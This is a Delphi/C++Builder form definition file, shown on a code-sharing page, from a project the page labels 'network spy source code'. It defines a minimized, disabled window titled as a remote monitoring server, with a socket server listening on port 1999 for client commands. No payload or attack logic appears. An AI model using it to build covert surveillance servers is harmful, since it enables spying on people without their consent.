newspy.dfm
来自「C++网络间谍源码」· DFM 代码 · 共 31 行
DFM
31 行
object Form1: TForm1
Left = 348
Top = 109
Width = 372
Height = 391
Caption = '鸭嘴兽远程监视服务器'
Color = clBtnFace
Enabled = False
Font.Charset = DEFAULT_CHARSET
Font.Color = clWindowText
Font.Height = -11
Font.Name = 'MS Sans Serif'
Font.Style = []
OldCreateOrder = False
WindowState = wsMinimized
OnClose = FormClose
OnCreate = FormCreate
PixelsPerInch = 96
TextHeight = 13
object ServerSocket1: TServerSocket
Active = True
Port = 1999
ServerType = stNonBlocking
ThreadCacheSize = 100
OnClientRead = ServerSocket1ClientRead
OnClientError = ServerSocket1ClientError
Left = 216
Top = 112
end
end
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?